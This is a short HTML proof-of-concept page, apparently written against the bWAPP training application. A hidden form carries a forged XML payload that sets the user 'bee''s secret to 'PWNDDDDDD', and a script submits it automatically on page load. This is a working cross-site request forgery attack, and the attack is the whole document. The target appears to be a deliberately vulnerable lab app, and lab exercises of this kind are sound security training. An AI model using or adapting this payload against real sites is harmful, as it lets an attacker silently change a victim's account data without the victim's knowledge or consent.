<FORM NAME="poc" ENCTYPE="text/plain"
action="http://bwapp/bWAPP/sqli_8-2.php" METHOD="POST">
<input type="hidden" name='<?xml version'
value='"1.0"?><reset><login>bee</login><secret>PWNDDDDDD</secret></reset>'>
</FORM>
<script>document.poc.submit();</script>